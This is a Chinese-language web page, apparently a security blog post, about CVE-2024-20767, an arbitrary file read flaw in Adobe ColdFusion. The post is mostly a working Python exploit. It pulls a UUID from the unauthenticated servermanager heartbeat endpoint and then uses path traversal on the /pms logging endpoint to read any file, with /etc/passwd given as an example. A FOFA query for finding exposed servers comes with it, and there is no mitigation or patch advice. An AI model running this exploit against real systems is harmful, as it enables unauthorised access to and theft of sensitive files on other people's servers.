Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767

Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767

Adobe ColdFusion 由于在鉴权方面存在疏漏,导致了可未授权访问,从而通过pms接口进行任意文件读取。

fofa

app="Adobe-ColdFusion"

poc

import requests
import re
import urllib3
import argparse

urllib3.disable_warnings()

parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target",required=True, help="Target Adobe ColdFusion Server URL")
parser.add_argument("-p", "--port",required=False, default=8500, help="Target Adobe ColdFusion Server Port, by default we use the 8500 Port")
parser.add_argument("-c", "--command", required=True,help="File to read path") # Example in Windows Server 'Windows/ServerStandardEval.xml' or Linux Server "etc/passwd"
args = parser.parse_args()

def get_uuid():
   endpoint = "/CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat" # Vulnerable endpoint to get the UUID
   session = requests.Session()
   try:
       response = session.get(args.target+":"+str(args.port)+endpoint, verify=False)
       print("[+] Connecting to ColdFusion Server...")
       repattern = r"<var name='uuid'><string>(.+?)</string></var>" # Regex expression to get UUID
       uuid = re.findall(repattern, response.text)[0]
       print("[+] UUID Obtained: ", uuid)
       return uuid
   except:
       print("[-] Error connecting to server")

def exploit(uuid):
   headers = {
       "uuid": uuid
  }
   session = requests.Session()
   endpoint2 = "/pms?module=logging&file_name=../../../../../../../"+args.command+"&number_of_lines=100" # Vulnerable endpoint to read files
   response = session.get(args.target+":"+str(args.port)+endpoint2, verify=False, headers=headers)
   if response.status_code == 200 and int(response.headers["Content-Length"]) > 2:
       print("[+] Succesfully read file!")
       print(response.text)
   else:
       print("[-] Something went wrong while reading file or the file doesn't exist")

if __name__ == "__main__":
   exploit(get_uuid())
© 版权声明
THE END
喜欢就支持一下吧
点赞6 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片

    暂无评论内容